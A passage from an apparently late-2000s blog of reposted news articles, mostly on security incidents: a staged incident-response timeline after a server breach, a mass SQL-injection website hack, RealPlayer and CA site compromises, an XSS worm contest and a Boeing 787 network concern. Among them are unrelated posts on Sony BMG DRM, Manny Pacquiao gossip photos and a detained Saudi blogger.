With full network access, Blackjack is able to easily identify the connection to the government agency and quickly access the server that runs its payment website. Within minutes, he has identified an open port and used it to access the payment server, where he runs a malicious script to trick the server into revealing the usernames, passwords and payment histories of thousands of users.

Monday, 3pm
The government agency has more sophisticated firewalls and intrusion-detection systems than People Inc, and the IT security team are alerted by a series of odd characters and sequences that something is happening on the web server. However, it's not immediately apparent that...

...the system has been compromised, and no alerts have yet been triggered. "When you go in as an attacker during a penetration test, it's relatively easy to be undetected, providing you don't start changing or deleting data," said Ravid Zavlinsky, of web-security specialist Applicure. "Many clients we speak to think their sites are impenetrable, [while] we find that they're being accessed every one or two minutes in fact."

Monday, 4pm
The hacker's next step is to create a new administrator account on the server — he knows the likelihood of this account being deleted in future is slim, even if staff don't recognise the name associated with the account. With this account, he copies some data from a database table and deletes a series of security profiles — eventually triggering the government agency's IT security systems.

When the IT manager on duty sees the alert from both the firewall and intrusion-detection system, he realises an attack may be in progress. He immediately asks for copies of any logs that are available, including the web server, database, firewall and intrusion-detection system. These logs should reveal what requests were made to the database and web server, and help to locate any attack scripts. This job should be overseen by a security specialist, as it can be hard to locate scripts created by an experienced hacker.

Although it's often a very slight chance that a hacker could be identified and caught, it's important to warn the police before you do anything that tips off the hacker you know about him

Brian Chess, Fortify Software

Completing this audit before disconnecting any machine from the network is absolutely vital, according to the experts. "If you panic and simply pull the plug out of the wall, you will lose a good deal of evidence because of volatile memory footprints," said Jose Nazario, senior security researcher with Arbor Networks. "You also lose any track a hacker may have left of what they have accessed or changed, and it makes it much harder to see what they are doing if there are no active processes running."

Moreover, if you don't know what's happened, there is no guarantee the hacker isn't still hiding on the network, observed Brian Chess, chief scientist with security company Fortify Software.

Back at the government agency, the logs reveal that the agency's web server has been compromised and, more seriously, the database server holding web-payment records and user IDs for thousands of citizens has been accessed and some records deleted. The user IDs and passwords of the database administrators have been accessed, and running an anti-rootkit application reveals that a number of rootkits have been installed on the database server.

Monday, 4.30pm
Now that he has a clearer idea of what has been compromised, the head of IT calls the chief information officer, who immediately informs the chief executive of the security breach. The chief information officer also informs the police, who contact the Serious Organised Crime Agency (SOCA), and government security agencies of the attack. "Informing the authorities is often a regulatory requirement, but it's also important to give them the chance to help identify and track down the culprits," said Chess. The chief information officer and the chief executive decide to delay issuing a public statement until there is more information about the security breach itself.

It is important to inform the authorities early on in an attack situation, before all evidence that might trap the hacker...

...is lost, said Chess. "Although it's often a very slight chance that a hacker could be identified and caught, it's important to warn the police before you do anything that tips off the hacker you know about him. It's also important they can come in before the audit trail is lost."

Monday, 5pm
The head of IT meets the chief information officer and IT security specialists to devise a plan of action. The agency has a well-established policy for dealing with security breaches, which means staff are less likely to panic and make poor decisions in a crisis. To ensure that your IT team doesn't panic during the immediate aftermath of an attack, ensure there are written policies detailing the procedure to be followed. "There should be clear rules to guide the team, and rule number one is never unplug the server until you know what you are dealing with," Chess said.

While the action plan is being formulated, the agency uses an automated tool to block the IP address of the hacker. An automated tool is often the best option in this situation, since, as soon as you block a hacker's IP address, he will often switch to another IP address within seconds.

Monday, 5.30pm
One team of IT staff is dispatched to examine the web server, the server is temporarily taken offline, and a "closed for essential maintenance page" is posted on the website. The clean-up team runs a full antivirus and anti-rootkit check on the web server and uses the previous day's backup disk to verify that nothing on the server has been deleted or amended.

The head of IT realises that just rebooting the system isn't an option, since it would compromise evidence but could also prevent the clean-up team from easily seeing what has been done while the machine was running.

Auditing the logs and examining the requests made to the server reveals that the hacker exploited a known vulnerability in the server operating system to gain access to the system, and this weakness is immediately patched.

The clean-up team also ensures that all other patches to the server have been applied, and that there are no other known vulnerabilities that could result in the server being attacked again. It's important not to apply patches or make any system changes until this investigation is complete, said Zavlinsky. "Making untested or ad-hoc changes to an application could just add further vulnerabilities."

This is a real danger if a hacker is determined to target your organisation. "The ultimate goal for many hackers is to take a server offline within minutes of it going back online," added Zavlinsky. "So it is vital not to reboot a server unless you are absolutely confident you know what the problem was and that it has been fixed. Otherwise, you'll be up and down for three days trying to sort it all out."

At the same time, a second team is examining the compromised database server. The database is relatively complex and has links into multiple other agencies and systems. After examining the logs and audits, the investigation team realises the hacker has leveraged a SQL injection and created a false administrator login to the machine. From here, the hacker accessed a number of user IDs and passwords, then moved on to look at financial records and security documents, and deleted some records altogether.

"This isn't a great situation to be in," said Chess. "They've opened the back door but now they've also got a key to the front door as well." The priority is to discover which records have been accessed and to compare the database with the most recent backup to look for changes or deletions. Since it is possible that credit-card and direct-debit details may have been accessed, the chief information officer immediately informs the relevant banks of the potential breach.

Monday, 8pm
A subsequent scan of the server for malware or other scripts shows a number of scripts and programs have been added, including rootkits that could be used to further compromise the network. At this point, the head of IT makes the decision that cleaning up the machine will be too time-consuming, and...

...decides to simply install a new server in place of the affected machine. "Sometimes that's the best decision to make, because you'll spend weeks sorting out the infected machine and you'll never be sure you've got everything," said Chess.

Monday, 10pm
The next task is to update all the organisation's security patches and run a complete check for malware, viruses or other attack scripts. The firewall and intrusion-detection system are updated, and a team of forensic computing experts arrive from a specialist consultancy to begin checking the logs and audits to see if any other systems have been altered or accessed. This team will be able to spot modifications or potential attack scripts far more easily than a general IT specialist.

Tuesday, 8am
After overnight testing and a comprehensive patch update, the web server goes back online, along with the new database server. Although there seem to be no problems, the systems and all logs are closely monitored for any sign of attack or irregular behaviour. The team are also closely monitoring the internet for any sign that the credit-card numbers accessed have been posted online, or offered for sale.

As an added precaution, all payment facilities are unavailable during the following 24 hours, until the team is certain the new servers are functioning properly and are fully secure.

Telling people the bad news is tricky but, if you want to retain their trust, it makes good sense

Jose Nazario, Arbor Networks

Tuesday, 8.30am
Once the systems are back online, proceedings in the aftermath of the attack begin. First, the chief information officer meets with the chief executive and other senior government officials to discuss what information was taken, who needs to be notified of the attack and how the organisation might be affected. "This is the point in time where non-IT executives should be actively involved," said Chess. "It's not necessary to wait until the clean-up is finished, but you need to be certain that you have information to give them on these vital questions."

In this case, since the information accessed includes payment records (including credit-card numbers), it is decided that the agency should issue a public statement explaining what information has been accessed and what the potential consequences of this might be. Consumers are instructed that they will be issued with new user IDs and passwords for the website, and banks will cancel and reissue credit cards for consumers affected by the breach.

This seems like a lot of hassle, but security experts argue it's better than trying to bury the bad news. "Telling people the bad news is tricky but, if you want to retain their trust, it makes good sense," said Nazario. "It also makes sense because, if people are aware of the danger, it limits the scope of the damage, by putting them on their guard."

And finally...
Once these initial response steps are completed, the experts said anyone recovering from a hacking attack should:

  • Review the attack with relevant IT staff: what happened; how can we be sure it won't happen again?
  • Ask what vulnerability was exploited and what others might exist that are unknown
  • Audit the IT security systems to see whether you need new firewall/intrusion-detection/antivirus technologies, or whether an application layer security device would prove worthwhile
  • Ensure that your policies and procedures are kept updated, and incorporate any lessons learned from this attack into a policy for future incidents

Posted in | 0 comments

Mass hack infects tens of thousands of sites

Then they serve visitors multiple exploits, including October RealPlayer attack

Tens of thousands of Web sites have been compromised by an automated SQL injection attack, and although some have been cleaned, others continue to serve visitors a malicious script that tries to hijack their PCs using multiple exploits, security experts said this weekend.

Roger Thompson, the chief research officer at Grisoft SRO, pointed out that the hacked sites could be found via a simple Google search for the domain that hosted the malicious JavaScript. On Saturday, said Thompson, the number of sites that had fallen victim to the attack numbered more than 70,000. "This was a pretty good mass hack," said Thompson, in a post to his blog. "It wasn't just that they got into a server farm, as the victims were quite diverse, with presumably the only common point being whatever vulnerability they all shared."

Symantec Corp. cited reports by other researchers -- including one identified only as "websmithrob" -- that fingered a SQL vulnerability as the common thread. "The sites [were] hacked by hacking robot by means of a SQL injection attack, which executes an iterative SQL loop [that] finds every normal table in the database by looking in the sysobjects table and then appends every text column with the harmful script," said websmithrob in a blog post. "It's possible that only Microsoft SQL Server databases were hacked with this particular version of the robot since the script relies on the sysobjects table that this database contains."

According to websmithrob, the attack appends a JavaScript tag to every piece of text in the SQL database; the tag instructs any browser that reaches the site to execute the script hosted on the malicious server.

Hacked sites included both .edu and .gov domains, the SANS Institute's Internet Storm Center (ISC) reported in a warning posted last Friday. The ISC also reported that several pages of security vendor CA Inc.'s Web site had been infected.

Grisoft's Thompson said that his research had identified a 15-month-old vulnerability as one of those exploited by the attack code. The exploit, he said, targeted the MDAC (Microsoft Data Access Components) bug patched in April 2006 with the MS06-014 security update. "They went to the trouble of preparing a good Web site exploit, and a good mass hack but then used a moldy old client exploit. It's almost a dichotomy," said Thompson.

Other researchers, including websmithrob and Symantec, said that the JavaScript also launched an exploit targeting a much more recent vulnerability: a RealPlayer bug that first surfaced last October. The flaw was fixed several days later by RealNetworks Inc.

Another surprise, Thompson said, was the speed of the hack's cleanup. Although a Google search still showed thousands of sites infected with the script on Saturday, Thompson claimed that Grisoft's LinkScanner Pro tool indicated that nearly all had actually been scrubbed. "I found that really surprising [that they were cleaned so quickly]," he said in an interview via instant messaging on Sunday. "They're all so disparate. If it was a big server farm, I could understand it being cleaned so quickly, but there doesn't seem to be anything common about them all."

The ISC updated its alert Sunday, saying another round of SQL injection attacks had infected sites with a script referring to a different malicious server. When asked to examine the second domain, Thompson confirmed that it was serving up the same malicious JavaScript as the first. However, many of those sites -- which as of this morning numbered more than 93,000, according to a quick Google search -- had not been cleaned.

"It looks like a bunch of these are still carrying the references to [the malicious domain] but not infectively," said Thompson. "In other words, they're still hacked, but the injection hasn't worked properly."

Microsoft was not immediately available for comment on the SQL Server vulnerability used by the mass hack.

Posted in | 0 comments

Sony BMG to drop copy protection for downloads

NEW YORK (Reuters) - Sony BMG Music Entertainment, the world's second largest music company, will this month become the last of the big four majors to drop copy protection software on music downloads, also known as digital rights management (DRM).

Sony BMG, home to artists including Beyonce, Britney Spears and Celine Dion, said on Monday it will launch a gift card service on January 15 called Platinum MusicPass that will feature digital albums from its artists in the MP3 format. The format does not use DRM protection.

Fans will be able to buy the digital album cards in stores and download full-length albums from a MusicPass Web site after they type in an identifying number. The cards will be available at U.S. retail outlets such as Best Buy and Target.

"The introduction of MusicPass is an important part of Sony BMG's ongoing campaign to bring its artists' music to fans in new and innovative ways, and to develop compelling new business models," said Thomas Hesse, Sony BMG president, global digital business & U.S. Sales.

The music industry posted a 15 percent drop in album sales in 2007 as fans bought fewer CDs. Digital music sales did not make up for the revenue shortfall, forcing executives to explore new business models and ways of attracting consumers.

One of the biggest issues for music companies last year was whether dropping DRM would help drive digital sales.

In February, Apple Inc founder Steve Jobs called on music companies to stop requiring retailers to use DRM for services like his company's iTunes Music Store. Jobs said dropping DRM would help boost sales.

Digital music buyers have been frustrated by the limitations imposed by DRM, prompting industry analysts to support the call to drop copy protection. Music companies had required DRM to prevent users from making multiple copies or sharing songs with friends for free.

EMI, the number four music company in market share became the first major to drop DRM in April and was later followed by Vivendi's Universal Music Group. Last month, Warner Music Group said it would start selling its music in MP3 format through Amazon.com.

Posted in | 0 comments

RealPlayer flaw raises security flags

Security experts are warning users to be vigilant after the disclosure of a new security vulnerability in RealPlayer.

The flaw could allow an attacker to remotely execute code on a victim's machine.

Security researcher Evgeny Legerov originally posted the vulnerability on New Year's Day, but did not specify the exact nature of the flaw.

Secunia reported in an advisory that the problem is in fact a buffer overflow error. If exploited, the error could cause an application crash which would give an attacker the ability to execute code.

Buffer overflow errors are often used by attackers to install malware. Secunia advises users to avoid opening untrusted files or visiting suspicious websites.

Security firm Sans Institute also urged users to avoid suspicious files and sites, and recommends that system administrators block access to a pair of domains which have shown a history of exploiting RealPlayer flaws.

Posted in | 0 comments

Manny Pacquiao Scandal

Eto ang mga kumakalat na mga controversial pics ni Pacman sa pakikipag party nya sa Embassy Club sa Taguig.

Kayo na ang humusga.

manny1.jpg


manny2.jpg


manny3.jpg


manny4.jpg


manny5.jpg


manny6.jpg


manny7.jpg

Posted in | 1 comments

Malware Writers Hack CA's Site

The security vendor has fixed the damage, but the site briefly redirected visitors to a malicious site in China.

Part of security software vendor CA's Web site was hacked earlier this week and was redirecting visitors to a malicious Web site hosted in China.

Although the problem now appears to have been corrected, cached versions of some pages in the press section of CA.com show that earlier this week the site had been redirecting visitors to the uc8010.com domain, which has been serving malicious software since late December, according to Marcus Sachs, director of the SANS Internet Storm Center.

The hack is similar to last year's attack on the Dolphin Stadium Web site, which infected visitors looking for information on the Super Bowl football game, Sachs said. "It's exactly the same setup," he said. "It's JavaScript that they've managed to insert into the title or the body of the HTML."

CA itself may not even host the press release section of its site, as that job is often outsourced to a third party, Sachs said. Often a misconfigured application server or a Web or database programming error can give hackers all the opening they need to insert their malicious code.

"When you outsource, you've got to be just as (demanding) about security as you are with your own site," Sachs said.

CA representatives could not be reached immediately for comment.

The uc8010.com domain serves attack code that exploits a recently patched vulnerability in the RealPlayer multimedia software, Sachs said.

The criminals behind this domain have hacked tens of thousands of Web pages and inserted code that redirects visitors to the malicious server, he added.

SANS has posted a note on the uc8010.com issue and recommends that IT staff block access to the domain. Sachs said another domain, ucmal.com -- also hosted in China -- should also be blocked because it is associated with a similar type of attack.

Posted in | 0 comments

State Web sites back after hack attack

HARRISBURG | - The official Pennsylvania Web site and the Web pages of several state agencies were taken offline Friday after hackers in China infiltrated them. But state officials said they don't believe any sensitive information was compromised.

The Rendell administration learned about 10 a.m. that a virus had infected the Internet site. Agencies affected by the attack were the departments of Education, Labor and Industry, and Military and Veterans Affairs, as well as the Pennsylvania Lottery.

The hackers detected a vulnerability in a media player package and used that to get into the system, said Mia DeVane, a spokeswoman for the Office of Administration. ''When there's a hack, they get in through a back door,'' she said.

DeVane said the state needed to take down the sites ''to make sure a virus couldn't spread.''

Information technology employees located the source of the attack, she said. ''Our IT security experts…looked at the network domain, which came out of China.''

Officials found no damage to personal computers and were continuing to investigate, DeVane said. ''At this point, we believe our anti-virus software prevented any PCs from being taken over,'' she said.

By late afternoon Friday, access to several state sites had been restored. But before that, visitors to the official state Web site (www.state.pa.us) received this message: ''The Commonwealth of Pennsylvania Web site that you are trying to reach is either not available or is undergoing maintenance. Please try back later. Thank you for your patience.''

DeVane said state Web sites unaffected by the attack also were taken down as a precaution. They included the Department of Agriculture, which provides information on the annual Pennsylvania Farm Show that starts today.

DeVane said the state routinely fends off such attacks. In October, state officials were recognized by a national IT officers' group for their computer security efforts.

''This is something that we fight every day,'' DeVane said. ''Viruses are a constant issue. We fight them off every day, and it's successful.''

The hacker attack appeared limited to executive branch sites only. Web sites maintained by the Legislature were not affected, said representatives of all four caucuses.

The Associated Press contributed to this story.

Posted in | 0 comments

Contest seeks the most diminutive XSS worm

Think you have a gift for writing compact code that replicates using one of the web's most vexing classes of security vulnerabilities? Then Security researcher RSnake (aka Robert Hansen) would like to hear from you. He has set up a contest to see who can write a self-propagating cross-site scripting (XSS) worm using the fewest number of characters.

XSS bugs are the bane of web and application programmers alike because they allow attackers to steal email, bank account credentials and other sensitive information by injecting malicious code into trusted websites. Worse yet, such vulnerabilities can be turned into self-propagating worms that use a victim's browser to multiply the damage. Over the past few years, some of the biggest web destinations - MySpace, Yahoo and Google's Orkut among them - have been overrun by the pest.

RSnake, a researcher who focuses on website security, has seen plenty of XSS worms. But he says he wants to see more still, particularly those that are boiled down to their essence, so that he and other security pros can better defend against them.

"Understanding the tools that hackers use for generic worm propagation is the foundation for writing tools to prevent that exact thing," he said in an instant message. "We have lots of examples of real life worm code, but the problem is it's almost always obfuscated, it has site specific code in it and it contains a payload. The only way to distill it is to ask people to make it as short as possible."

The best-known self-propagating XSS exploit to date was dubbed the Samy Worm by its creator, Samy Kamkar. In late 2005, the exploit needed less than a day to add more than 1 million MySpace users to Kamkar's MySpace profile and eventually caused News Corp. to temporarily shut down the social networking site. While the worm wasn't malicious, it alerted the world to the power that could be wielded from a modest amount of code that piggybacked off a high-traffic website.

More destructive was the JS-Yamanner worm, which in 2006 harvested email addresses by exploiting a vulnerability in Yahoo's web mail service.

There are no real prizes to be doled out in the Diminutive XSS Worm Replication Contest except for bragging rights and the satisfaction that comes from knowing you're helping push the boundaries of what's currently understood about the pest.

"If you pay attention there are really only two techniques, but tons of variants on those two techniques," RSnake says of XSS worms. The idea is to see as many different worms as possible so he and other researchers can better grasp common threads in them all.

Entries aren't to include the payloads themselves, only the mechanism that makes the code replicate. The exploits have to work in either the Internet Explorer browser version 7.0 or Firefox 2.x.

So far, a contestant by the handle of digi7al64 is the winner, having submitted an XSS worm with just 292 characters. The final winner will be announced on Jan. 10

Posted in | 0 comments

Saudi detains blogger, rights group urges release

RIYADH (Reuters) - The U.S.-based Committee to Protect Journalists has urged Saudi Arabia to release a blogger who has been detained in the conservative Muslim kingdom for almost a month for his writings.

Interior Ministry Spokesman Mansour al-Turki confirmed that Fouad al-Farhan was being detained but declined to say under what charges. The blogger was not being held over any security-related issues, he added.

The Committee to Protect Journalists said Farhan was arrested for writing articles about political prisoners in Saudi Arabia on his Web site (www.alfarhan.org).

"Arbitrarily detaining a writer and holding him for weeks without saying why violates the most basic norms for free expression and serves as a chilling reminder to those seeking to express their opinions," CPJ said in the letter.

"It also runs counter to official Saudi statements in support of reform and a more open press."

Farhan said Saudi authorities think he was running "an online campaign promoting the political prisoners issue", according to an email sent to friends, a copy of which was obtained by Reuters.

Saudi Arabia is often the target of complaints by rights groups. It recently faced international criticism over an Islamic court ruling that sentenced a gang-rape victim to flogging. The Saudi king later pardoned the 19-year old woman.

Posted in | 0 comments

New Boeing 787 vulnerable to hacking

ACCORDING TO to the U.S. Federal Aviation Administration, the new Boeing 787 Dreamliner aeroplane may have a serious security vulnerability in its on-board computer networks that could allow passengers to access the plane's control systems.

The computer network for the Dreamliner's passengers, designed to give passengers in-flight internet access and entertainment, is connected to the plane's control, navigation and communication systems, the FAA report reveals (the report is mirrored here).

It also connects to the airline's business and administrative-support network, which communicates maintenance issues to ground crews.

The design "allows new kinds of passenger connectivity to previously isolated data networks connected to systems that perform functions required for the safe operation of the airplane," says the FAA report. "Because of this new passenger connectivity, the proposed data-network design and integration may result in security vulnerabilities from intentional or unintentional corruption of data and systems critical to the safety and maintenance of the airplane."

Boeing said it's aware of the issue and has designed a solution it will test shortly.

More worryingly, there seems to be some confusion at Boeing as to what exactly the situation is, as Boeing spokeswoman Lori Gunter said the wording of the FAA document is misleading, and that the plane's networks don't completely connect. Why are you testing a new solution then?

Gunter said Boring is employing a combination of solutions that involves some physical separation of the networks, known as "air gaps," and software firewalls. Gunter also mentioned other technical solutions, which she said are proprietary and didn't want to discuss in public.

Short of the necessity to pause programming for announcements by the crew, which could surely be routed by some safe means, we just cannot contemplate why on earth the navigation and control systems need to be connected to the on-boardpassenger entertainment network, and why this was ever thought plausible and safe in the first place.

In our opinion a system like this is never 100% safe unless the two networks are completely physically separated.

The INQ will stick to flying airships from now on.

Posted in | 0 comments